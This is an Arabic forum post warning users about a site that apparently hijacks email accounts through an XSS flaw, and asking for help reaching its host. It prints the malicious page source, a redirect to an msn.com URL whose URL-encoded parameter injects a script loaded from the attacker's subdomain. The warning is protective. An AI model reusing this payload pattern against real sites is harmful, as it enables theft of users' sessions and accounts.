السلام عليكم .. مازالت الحرب مستمره على اطفال النت ....
قمنا بمراسلة الشركة المستضيفه للموقع ولكن اتضح انها مستضييفه فقط للدومين ....
ولا استطيع ايجاد عنوان للشركة المستضيفه الفعليه للموقع الرجاء ان كان احد يعرف عنها شي ابلااغهم فورا وبسرعه .... فمساحة الموقع تستخدم لأختراق البريد وايذاء الناس من خلاال ثغرة xss
وهذا رابط الموقع المستخدم للاختراق .. وكما نلااحظ انه يستخدم سب دومين
http://www.a.mlikat.com
اما دومين الموقع كامل http://www.mlikat.com/
بعد فتح المصدر اكتشفت التالي ...
<html>
<script>
location = "http://wereldbeker.be.msn.com/news/article/?id=150377%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3A%2F%2F %77%77%77%2E%61%2E%6D%6C%69%6B%61%74%2E%63%6F%6D%2F%6C%6F%67%2E%6A%73%3e%3c%2f%73%63%72%69%70%74%3e; "
</script>
</html>
الثغره وهي مشفره
السيرفر المستضافه عليه الموقع هذا هو ..
Name Servers:
NS3.UAE-DNS.COM
NS4.UAE-DNS.COM
بس ماقدرت اعرف العنوان حتى اقوم بتنبيه الشركه ووضع حد له ...
لذالك وجب التنبيه اخواني .... احذروا من الدخول للموقع ...